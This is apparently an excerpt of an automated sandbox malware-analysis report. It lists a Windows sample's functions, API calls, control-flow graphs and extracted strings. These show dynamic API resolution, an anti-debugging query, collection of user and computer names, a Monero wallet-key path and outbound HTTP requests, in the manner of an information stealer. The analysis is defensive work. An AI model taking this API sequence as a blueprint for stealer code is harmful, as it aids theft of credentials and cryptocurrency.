                          • GetProcAddress.KERNEL32(75900000,006E05D0), ref: 00C09964
                          • GetProcAddress.KERNEL32(75900000,006E0768), ref: 00C0997C
                          • GetProcAddress.KERNEL32(75900000,006E06D8), ref: 00C09995
                          • GetProcAddress.KERNEL32(75900000,006E0630), ref: 00C099AD
                          • GetProcAddress.KERNEL32(75900000,006D6680), ref: 00C099C5
                          • GetProcAddress.KERNEL32(75900000,006E06F0), ref: 00C099DE
                          • GetProcAddress.KERNEL32(75900000,006E05E8), ref: 00C099F6
                          • GetProcAddress.KERNEL32(75900000,006D6A00), ref: 00C09A0E
                          • GetProcAddress.KERNEL32(75900000,006E0708), ref: 00C09A27
                          • GetProcAddress.KERNEL32(75900000,006E0780), ref: 00C09A3F
                          • GetProcAddress.KERNEL32(75900000,006D66C0), ref: 00C09A57
                          • GetProcAddress.KERNEL32(75900000,006E0720), ref: 00C09A70
                          • GetProcAddress.KERNEL32(75900000,006D66E0), ref: 00C09A88
                          • LoadLibraryA.KERNEL32(006E0600,?,00C06A00), ref: 00C09A9A
                          • LoadLibraryA.KERNEL32(006E0738,?,00C06A00), ref: 00C09AAB
                          • LoadLibraryA.KERNEL32(006E0618,?,00C06A00), ref: 00C09ABD
                          • LoadLibraryA.KERNEL32(006E0648,?,00C06A00), ref: 00C09ACF
                          • LoadLibraryA.KERNEL32(006E07C8,?,00C06A00), ref: 00C09AE0
                          • GetProcAddress.KERNEL32(75070000,006E07E0), ref: 00C09B02
                          • GetProcAddress.KERNEL32(75FD0000,006E07F8), ref: 00C09B23
                          • GetProcAddress.KERNEL32(75FD0000,006E8EF8), ref: 00C09B3B
                          • GetProcAddress.KERNEL32(75A50000,006E8FB8), ref: 00C09B5D
                          • GetProcAddress.KERNEL32(74E50000,006D68C0), ref: 00C09B7E
                          • GetProcAddress.KERNEL32(76E80000,006E8800), ref: 00C09B9F
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C09BB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: jm$NtQueryInformationProcess$fm
                          • API String ID: 2238633743-1598263956
                          • Opcode ID: 04084f0072162eb4d9ebb8ecfe5bf933c00f67c515d35cdea0e1da888fc89d66
                          • Instruction ID: 6d4e173ee8d56a83bf0fd6ebe8ec5cf892e555306a50fba031d8e791f01b034c
                          • Opcode Fuzzy Hash: 04084f0072162eb4d9ebb8ecfe5bf933c00f67c515d35cdea0e1da888fc89d66
                          • Instruction Fuzzy Hash: C7A16CB55042089FD348EFAAED8CA663FF9F79C30170C453AA685A3274D63994C9CB12
                          Function 00BF45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 bf45c0-bf4695 RtlAllocateHeap 781 bf46a0-bf46a6 764->781 782 bf474f-bf47a9 VirtualProtect 781->782 783 bf46ac-bf474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BF479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BF46D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: afb28f3f9af297209b177c6dd401ac5f8367e02f1f19017f1b05d8b9a5b18be3
                          • Instruction ID: a96ab823f2d8c6bcbcdbd37063e1242bbc98870e299eb7b6d5e8a16cee3c73aa
                          • Opcode Fuzzy Hash: afb28f3f9af297209b177c6dd401ac5f8367e02f1f19017f1b05d8b9a5b18be3
                          • Instruction Fuzzy Hash: 8A41F4707CA608FBEE2AB7B488C6DDF76A6DFC7708F509160EA00536D0CAB066805576
                          Function 00BF4880 Relevance: 32.0, APIs: 11, Strings: 7, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 bf4880-bf4942 call c0a7a0 call bf47b0 call c0a740 * 5 InternetOpenA StrCmpCA 816 bf494b-bf494f 801->816 817 bf4944 801->817 818 bf4ecb-bf4ef3 InternetCloseHandle call c0aad0 call bf9ac0 816->818 819 bf4955-bf4acd call c08b60 call c0a920 call c0a8a0 call c0a800 * 2 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a920 call c0a8a0 call c0a800 * 2 InternetConnectA 816->819 817->816 828 bf4ef5-bf4f2d call c0a820 call c0a9b0 call c0a8a0 call c0a800 818->828 829 bf4f32-bf4fa2 call c08990 * 2 call c0a7a0 call c0a800 * 8 818->829 819->818 905 bf4ad3-bf4ad7 819->905 828->829 906 bf4ad9-bf4ae3 905->906 907 bf4ae5 905->907 908 bf4aef-bf4b22 HttpOpenRequestA 906->908 907->908 909 bf4ebe-bf4ec5 InternetCloseHandle 908->909 910 bf4b28-bf4e28 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a9b0 call c0a8a0 call c0a800 call c0a920 call c0a8a0 call c0a800 call c0a740 call c0a920 * 2 call c0a8a0 call c0a800 * 2 call c0aad0 lstrlen call c0aad0 * 2 lstrlen call c0aad0 HttpSendRequestA 908->910 909->818 1021 bf4e32-bf4e5c InternetReadFile 910->1021 1022 bf4e5e-bf4e65 1021->1022 1023 bf4e67-bf4eb9 InternetCloseHandle call c0a800 1021->1023 1022->1023 1024 bf4e69-bf4ea7 call c0a9b0 call c0a8a0 call c0a800 1022->1024 1023->909 1024->1021
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BF4915
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C10DDB,00000000,?,?,00000000,?,",00000000,?,006EE540), ref: 00BF4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BF4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BF4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BF4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4EC5
                          • HttpOpenRequestA.WININET(00000000,006EE5B0,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF4B15
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00BF4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------$0n$@n
                          • API String ID: 460715078-3736300606
                          • Opcode ID: 439e4ba1de88278b933e36541394e2ac4627bb98a8eba76f2d076b912decfaf6
                          • Instruction ID: 8a3c7e50044fced6f53473a55161d8a4cf271fa092b080146d7af1a60139bf77
                          • Opcode Fuzzy Hash: 439e4ba1de88278b933e36541394e2ac4627bb98a8eba76f2d076b912decfaf6
                          • Instruction Fuzzy Hash: 2812CB71910218AADB15EB90DD96FEEB778AF15300F5482A9B106720D1EF702F89DF62
                          Function 00C078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: c921b143352a821c07165c7ce9db42585a6bd365c723b688b96e3ba222632d75
                          • Instruction ID: a5b94127c7761555ce68b39bbb4f2e53d06ee052cde8543262a83c75fc9221a7
                          • Opcode Fuzzy Hash: c921b143352a821c07165c7ce9db42585a6bd365c723b688b96e3ba222632d75
                          • Instruction Fuzzy Hash: B50186B1904208EFC704DF99DD49BAABBBCFB04B21F104269F545E32C0C3745944CBA1
                          Function 00C07850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: a611f822598135dad58b08d7b4e04cacdc5dcdd1f018a4e55029461626f0cbde
                          • Instruction ID: 5b6d94dedd1df9330c754bc1d24c3a356bdcc517ee8f71aba8b605eb638abba2
                          • Opcode Fuzzy Hash: a611f822598135dad58b08d7b4e04cacdc5dcdd1f018a4e55029461626f0cbde
                          • Instruction Fuzzy Hash: 1EF04FB1D44208AFC704DF99DD49FAEFFB8EB04721F10026AFA05A2680C7741548CBA1
                          Function 00BF1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
